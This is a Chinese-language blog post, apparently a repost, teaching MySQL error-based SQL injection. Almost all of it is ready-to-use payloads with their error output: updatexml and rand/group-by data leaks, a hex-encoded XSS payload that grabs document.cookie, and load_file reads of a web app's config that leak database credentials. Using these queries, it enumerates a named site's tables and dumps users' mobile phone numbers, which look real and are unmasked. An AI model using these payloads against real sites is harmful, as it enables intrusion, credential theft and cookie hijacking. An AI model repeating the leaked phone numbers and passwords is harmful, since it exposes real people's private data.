报错是如何转为xss的?
mysql语句在页面报错,泄露信息
=========================================================================================================================================================================
*报错方式之“updatexml”,有字数限制,但无需配合union。
-mysql> select updatexml(1, concat(‘:‘, ‘test‘), 1);
ERROR 1105 (HY000): XPATH syntax error: ‘:test‘
-mysql> select updatexml(1, concat(0x3a, ‘test‘), 1);
ERROR 1105 (HY000): XPATH syntax error: ‘:test‘
-mysql> select updatexml(1, concat(0x5e, ‘test‘), 1);
ERROR 1105 (HY000): XPATH syntax error: ‘^test‘
-mysql> select * from f_user where id=1 or 1=updatexml(1,concat(0x5e, ‘test‘),1);
ERROR 1105 (HY000): XPATH syntax error: ‘^test‘
**将上面‘test’换成你的子查询语句或函数均可。
*group by+rand(0)+having,无字数限制,无需配合union。
-mysql> select * from f_user where id=1 or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0);
ERROR 1062 (23000): Duplicate entry ‘5.6.21-log~1‘ for key ‘group_key‘
*报错方式之“rand+count+group by”,需配合union
rand(0)无论在哪台机器运行多少次,生成的序列都是一样的
参考mysql开发者社区曝光的bug http://bugs.mysql.com/bug.php?id=8652
-mysql> select 1,2,count(*),concat(‘test‘, char(0x5e), floor(rand(0)*2))x from information_schema.tables group by x;
ERROR 1062 (23000): Duplicate entry ‘test^1‘ for key ‘group_key‘
-mysql> select 1,2,count(*),concat(‘test‘, char(0x5e), left(rand(0),3))x from information_schema.tables group by x;
ERROR 1062 (23000): Duplicate entry ‘test^0.7‘ for key ‘group_key‘
**将上面‘test’换成你的子查询语句或函数均可。
mysql转xss语句
mysql> select 1,2,count(*),concat((select 0x2F3E3C696D67207372633D226675636B22206F6E6572726F723D616C65727428646F63756D656E742E636F6F6B6965293E), char(0x5e), left(rand(0),3))x from information_schema.tables group by x;
ERROR 1062 (23000): Duplicate entry ‘/>^0.7‘ for key ‘group_key‘
直接爆配置文件密码,前提是有file权限
mysql>select 1,2,3,updatexml(1,concat(char(58),substr(load_file(0x2F616C69646174612F7777772F66616E676A69616E676A756E2F4170706C69636174696F6E2F436F6D6D6F6E2F436F6E662F64622E706870),150,40) ),1);
ERROR 1105 (HY000): XPATH syntax error: ‘:‘DB_NAME‘ => ‘fan******un‘,‘
mysql> select 1,2,3,updatexml(1,concat(char(58),substr(load_file(0x2F616C69646174612F7777772F66616E676A69616E676A756E2F4170706C69636174696F6E2F436F6D6D6F6E2F436F6E662F64622E706870),200,40) ),1);
ERROR 1105 (HY000): XPATH syntax error: ‘:‘DB_USER‘ => ‘s*********b‘, /‘
mysql> select 1,2,3,updatexml(1,concat(char(58),substr(load_file(0x2F616C69646174612F7777772F66616E676A69616E676A756E2F4170706C69636174696F6E2F436F6D6D6F6E2F436F6E662F64622E706870),250,40) ),1);
ERROR 1105 (HY000): XPATH syntax error: ‘:PWD‘ => ‘hahahaahhah‘,‘
爆版本
mysql> select 1,2,3,4 union select distinct concat((select version()),floor(rand(0)*2))a, count(*),3,4 from information_schema.tables group by a;
ERROR 1062 (23000): Duplicate entry ‘5.6.21-log1‘ for key ‘group_key‘
爆库名
mysql> select info();
ERROR 1305 (42000): FUNCTION fangjiangjun.info does not exist
mysql> select count(*), ( concat( (select database()), char(0x5e), floor(rand(0)*2) ) )x from information_schema.tables group by x;
ERROR 1062 (23000): Duplicate entry ‘fangjiangjun^1‘ for key ‘group_key‘
爆表名
mysql> select concat( (select distinct table_name from information_schema.tables limit 0,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;
ERROR 1062 (23000): Duplicate entry ‘CHARACTER_SETS^1‘ for key ‘group_key‘
mysql> select concat( (select distinct table_name from information_schema.tables limit 1,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;
ERROR 1062 (23000): Duplicate entry ‘COLLATIONS^1‘ for key ‘group_key‘
mysql> select concat( (select distinct table_name from information_schema.tables limit 2,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;
ERROR 1062 (23000): Duplicate entry ‘COLLATION_CHARACTER_SET_APPLICABILITY^1‘ for key ‘group_key‘
mysql> select concat( (select distinct table_name from information_schema.tables where table_schema=‘fangjiangjun‘ limit 0,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;
ERROR 1062 (23000): Duplicate entry ‘f_admin^1‘ for key ‘group_key‘
mysql> select concat( (select distinct table_name from information_schema.tables where table_schema=‘fangjiangjun‘ limit 1,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;
ERROR 1062 (23000): Duplicate entry ‘f_admin_role^1‘ for key ‘group_key‘
爆字段名
mysql> select concat( (select distinct column_name from information_schema.columns where table_schema=‘fangjiangjun‘ and table_name=‘f_user‘ limit 0,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;
ERROR 1062 (23000): Duplicate entry ‘id^1‘ for key ‘group_key‘
mysql> select concat( (select distinct column_name from information_schema.columns where table_schema=‘fangjiangjun‘ and table_name=‘f_user‘ limit 1,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;
ERROR 1062 (23000): Duplicate entry ‘login_time^1‘ for key ‘group_key‘
爆字段值
mysql> select concat( (select mobile_phone from fangjiangjun.f_user order by id limit 0,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;
ERROR 1062 (23000): Duplicate entry ‘18602029479^1‘ for key ‘group_key‘
mysql> select concat( (select mobile_phone from fangjiangjun.f_user order by id limit 1,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;
ERROR 1062 (23000): Duplicate entry ‘15602267509^1‘ for key ‘group_key‘
原文:http://www.cnblogs.com/aware-why/p/5844915.html
2365
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
